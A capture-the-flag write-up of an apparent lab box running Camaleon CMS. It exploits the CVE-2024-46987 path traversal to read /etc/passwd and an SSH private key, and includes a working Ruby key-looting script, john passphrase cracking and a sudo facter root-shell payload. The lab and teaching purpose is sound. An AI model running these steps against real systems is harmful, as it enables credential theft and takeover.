This post walks through CVE-2024-46987 in Camaleon CMS: after logging into the admin back end with a valid (self-registered) account, a path traversal in the private-file download endpoint reads arbitrary files from the server, including /etc/passwd and a user's SSH private key. The passphrase on the recovered key is cracked with john, the key gives an SSH login as trivia, and a sudo rule that lets trivia run facter as root without a password is abused to get a root shell. The post records information gathering, exploitation and privilege escalation step by step and closes with the lessons learned.

Information Gathering

Enumerate the target's ports

# Nmap 7.98 scan initiated Tue Feb  3 17:24:47 2026 as: /usr/lib/nmap/nmap -p 22,80,54321 -sC -sV -Pn -n -oN scan_results/nmap_details.txt 10.129.195.109
Nmap scan report for 10.129.195.109
Host is up (0.077s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 9.9p1 Ubuntu 3ubuntu3.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 4d:d7:b2:8c:d4:df:57:9c:a4:2f:df:c6:e3:01:29:89 (ECDSA)
|_  256 a3:ad:6b:2f:4a:bf:6f:48:ac:81:b9:45:3f:de:fb:87 (ED25519)
80/tcp    open  http    nginx 1.26.3 (Ubuntu)
|_http-title: Did not follow redirect to http://facts.htb/
|_http-server-header: nginx/1.26.3 (Ubuntu)
54321/tcp open  http    Golang net/http server
|_http-title: Did not follow redirect to http://10.129.195.109:9001
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 400 Bad Request
|     Accept-Ranges: bytes
|     Content-Length: 303
|     Content-Type: application/xml
|     Server: MinIO
|     Strict-Transport-Security: max-age=31536000; includeSubDomains
|     Vary: Origin
|     X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
|     X-Amz-Request-Id: 1890CC8123C34797
|     X-Content-Type-Options: nosniff
|     X-Xss-Protection: 1; mode=block
|     Date: Tue, 03 Feb 2026 17:25:08 GMT
|     <?xml version="1.0" encoding="UTF-8"?>
|     <Error><Code>InvalidRequest</Code><Message>Invalid Request (invalid argument)</Message><Resource>/nice ports,/Trinity.txt.bak</Resource><RequestId>1890CC8123C34797</RequestId><HostId>dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8</HostId></Error>
|   GenericLines, Help, RTSPRequest, SSLSessionReq:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 400 Bad Request
|     Accept-Ranges: bytes
|     Content-Length: 276
|     Content-Type: application/xml
|     Server: MinIO
|     Strict-Transport-Security: max-age=31536000; includeSubDomains
|     Vary: Origin
|     X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
|     X-Amz-Request-Id: 1890CC7D5A0C80F5
|     X-Content-Type-Options: nosniff
|     X-Xss-Protection: 1; mode=block
|     Date: Tue, 03 Feb 2026 17:24:52 GMT
|     <?xml version="1.0" encoding="UTF-8"?>
|     <Error><Code>InvalidRequest</Code><Message>Invalid Request (invalid argument)</Message><Resource>/</Resource><RequestId>1890CC7D5A0C80F5</RequestId><HostId>dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8</HostId></Error>
|   HTTPOptions:
|     HTTP/1.0 200 OK
|     Vary: Origin
|     Date: Tue, 03 Feb 2026 17:24:52 GMT
|_    Content-Length: 0
|_http-server-header: MinIO

Port 80 redirects to facts.htb (add it to /etc/hosts before going further); the site behind it is Camaleon CMS.

Port 54321 answers with a Server: MinIO header and S3-style XML error bodies and redirects to port 9001, so it is a MinIO object-storage (S3-compatible) API endpoint. It plays no further role here.

Enumerate port 80

➜  Facts ffuf -u http://facts.htb/FUZZ -w /usr/share/wordlists/dirb/common.txt -mc 302

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://facts.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 302
________________________________________________

admin                   [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 1587ms]
admin.cgi               [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 1573ms]
admin.php               [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 1547ms]
admin.pl                [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 1529ms]

The /admin path redirects to a login form that also offers registration, so a fresh account can be created and used to log into the back end.

Once inside, the back end identifies itself as Camaleon CMS Version 2.9.0

A search for this version turns up CVE-2024-46987

CVE-2024-46987

CVE-2024-46987 is an authenticated arbitrary file read: after logging into the back end with a valid username and password, the admin/media/download_private_file endpoint does not reject ../ sequences in its file parameter, so the path escapes the intended directory and any file the web server's user can read is returned.

Requesting http://facts.htb/admin/media/download_private_file?file=../../../../../../../../etc/passwd returns the target's passwd file

Two users with a login shell are found

trivia:x:1000:1000:facts.htb:/home/trivia:/bin/bash
william:x:1001:1001::/home/william:/bin/bash

Requesting http://facts.htb/admin/media/download_private_file?file=../../../../../../../../home/trivia/.ssh/id_ed25519 returns trivia's SSH private key

The same request against william's home directory returns nothing
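The two requests above are easy to automate: read passwd through the traversal, work out which accounts can log in, and try the usual key names under each home directory. The script below is an added example written for this post (not Camaleon's code and not the original writeup's); it assumes the session cookie of a logged-in account is supplied in a CAMALEON_COOKIE environment variable (the variable name is this example's own choice) and that the key filenames in KEY_NAMES are worth trying. The passwd sample at the bottom is constructed for offline checks and mirrors the lines seen on the box.

```ruby
require "net/http"
require "uri"

# Base URL of the lab host and the vulnerable endpoint path from the writeup.
BASE_URL = URI("http://facts.htb")
ENDPOINT = "/admin/media/download_private_file"

# The endpoint is authenticated: paste the Cookie header of a logged-in
# Camaleon session (from the browser's dev tools) into this env var.
COOKIE = ENV["CAMALEON_COOKIE"]

# Private-key filenames to try under each user's ~/.ssh (assumed list).
KEY_NAMES = %w[id_ed25519 id_rsa id_ecdsa].freeze

# Build the traversal URL for an absolute path on the server, e.g.
# /etc/passwd -> ...?file=../../../../../../../../etc/passwd
# Eight "../" is what the writeup used; extra levels are harmless on Linux.
def traversal_url(path, base: BASE_URL, depth: 8)
  rel = ("../" * depth) + path.sub(%r{\A/+}, "")
  url = base.dup
  url.path = ENDPOINT
  # keep "/" literal, as in the writeup's URL; encode anything else
  url.query = "file=" + URI.encode_www_form_component(rel).gsub("%2F", "/")
  url
end

# Fetch one file through the traversal; nil unless the server answered 200.
def fetch_file(path, cookie:, base: BASE_URL)
  url = traversal_url(path, base: base)
  req = Net::HTTP::Get.new(url)
  req["Cookie"] = cookie
  res = Net::HTTP.start(url.host, url.port, open_timeout: 10, read_timeout: 10) do |http|
    http.request(req)
  end
  res.is_a?(Net::HTTPSuccess) ? res.body : nil
end

# Parse passwd text and keep accounts that can actually log in:
# root or uid >= 1000, with a real shell and a home directory.
def interactive_users(passwd)
  passwd.each_line.filter_map do |line|
    name, _pw, uid, _gid, _gecos, home, shell = line.chomp.split(":")
    next if shell.nil? || home.nil? || home.empty?
    next unless name == "root" || uid.to_i >= 1000
    next if shell.end_with?("nologin", "false")
    { name: name, home: home }
  end
end

# Candidate private-key paths for those users.
def key_candidates(users)
  users.flat_map { |u| KEY_NAMES.map { |k| File.join(u[:home], ".ssh", k) } }
end

# True if the body looks like a PEM/OpenSSH private key rather than an error page.
def private_key?(body)
  body.to_s.lstrip.start_with?("-----BEGIN")
end

# Constructed sample shaped like the passwd lines seen on the box (offline check data).
PASSWD_SAMPLE = <<~PASSWD
  root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
  trivia:x:1000:1000:facts.htb:/home/trivia:/bin/bash
  william:x:1001:1001::/home/william:/bin/bash
PASSWD

# Against the live target: read passwd, derive key paths, save every key found.
if __FILE__ == $PROGRAM_NAME && COOKIE
  passwd = fetch_file("/etc/passwd", cookie: COOKIE) || abort("no passwd returned; is the cookie valid?")
  key_candidates(interactive_users(passwd)).each do |path|
    body = fetch_file(path, cookie: COOKIE)
    next unless private_key?(body)
    out = path.tr("/", "_").sub(/\A_/, "")
    File.open(out, "w", 0o600) { |f| f.write(body) } # ssh refuses keys that are group/world readable
    puts "saved #{path} -> #{out}"
  end
end
```

Run it as CAMALEON_COOKIE='...' ruby loot.rb; each key that comes back is written with mode 0600 so it can be passed straight to ssh -i. Because the endpoint serves whatever the web server user can read, the same helper works for any other path, such as the CMS's own database configuration.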

Exploitation (User Flag)

SSH login

➜  Facts ssh -i id_ed25519 trivia@10.129.195.109
The authenticity of host '10.129.195.109 (10.129.195.109)' can't be established.
ED25519 key fingerprint is: SHA256:fygAnw6lqDbeHg2Y7cs39viVqxkQ6XKE0gkBD95fEzA
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.195.109' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_ed25519':

The key is passphrase-protected, so crack the passphrase with john

ssh2john id_ed25519 > trivia-hash

john trivia-hash -w=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 24 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
dragonballz      (id_ed25519)
1g 0:00:01:49 DONE (2026-02-03 18:07) 0.009164g/s 29.32p/s 29.32c/s 29.32C/s grecia..imissu
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Log in again with ssh -i id_ed25519 trivia@10.129.195.109 and enter the passphrase dragonballz

Privilege Escalation (Root Flag)

trivia@facts:/home/william$ sudo -l
Matching Defaults entries for trivia on facts:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User trivia may run the following commands on facts:
    (ALL) NOPASSWD: /usr/bin/facter

A quick search shows that facter (Puppet's fact-gathering tool) has a --custom-dir option that loads every .rb file in the given directory as Ruby code and evaluates it inside the facter process. Because the sudo rule lets trivia run /usr/bin/facter as root with any arguments and no password, a Ruby file placed in a directory trivia controls runs as root.

echo 'exec("/bin/bash")' > /tmp/root.rb
sudo /usr/bin/facter --custom-dir /tmp

This replaces the facter process with a root shell. The underlying problem is the sudo rule: it constrains the binary but not its arguments, and a binary that loads code from a caller-supplied directory is as good as an unrestricted shell, so NOPASSWD rules for such tools need the allowed arguments pinned in sudoers.
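The mechanism is worth seeing in isolation, because it also explains why the name of the payload file does not matter: the directory is loaded as a whole, not just its first file. The snippet below is an added illustration for this post and not facter's source; load_custom_facts is a simplified stand-in for what facter does with --custom-dir (its loader uses Kernel#load on each .rb file the same way), and the payload records the effective uid instead of calling exec so it can be run safely without facter installed and without root.

```ruby
require "tmpdir"

# Simplified stand-in for what `facter --custom-dir DIR` does with DIR:
# every *.rb file in it is loaded as Ruby code inside the facter process.
# Returns the list of files loaded, in load order.
def load_custom_facts(dir)
  Dir.glob(File.join(dir, "*.rb")).sort.each { |file| load file }
end

# Drop two "custom facts" into a scratch directory and load them the way
# facter would. The first is inert; the second records the effective uid of
# the process that loaded it. Returns the loaded file names and that uid,
# which equals the loader's own euid: fact code runs in-process with the
# loader's privileges, which is root when the loader is `sudo facter`.
def demo_custom_dir_execution
  Dir.mktmpdir("facter-demo-") do |dir|
    marker = File.join(dir, "ran_as")
    File.write(File.join(dir, "aaa_harmless.rb"),
               "# inert fact: loading does not stop after the first file\n")
    # The payload. Against the real facter the writeup's one-liner
    # exec("/bin/bash") goes here and replaces facter with a root shell.
    File.write(File.join(dir, "zzz_payload.rb"), <<~RUBY)
      File.write(#{marker.inspect}, Process.euid.to_s)
    RUBY
    loaded = load_custom_facts(dir).map { |f| File.basename(f) }
    { loaded: loaded, ran_as_euid: File.read(marker).to_i }
  end
end

if __FILE__ == $PROGRAM_NAME
  puts demo_custom_dir_execution.inspect
end
```

Run it as an ordinary user and ran_as_euid is your own uid; run it under sudo and it is 0, which is exactly the difference the sudo rule on this box hands out.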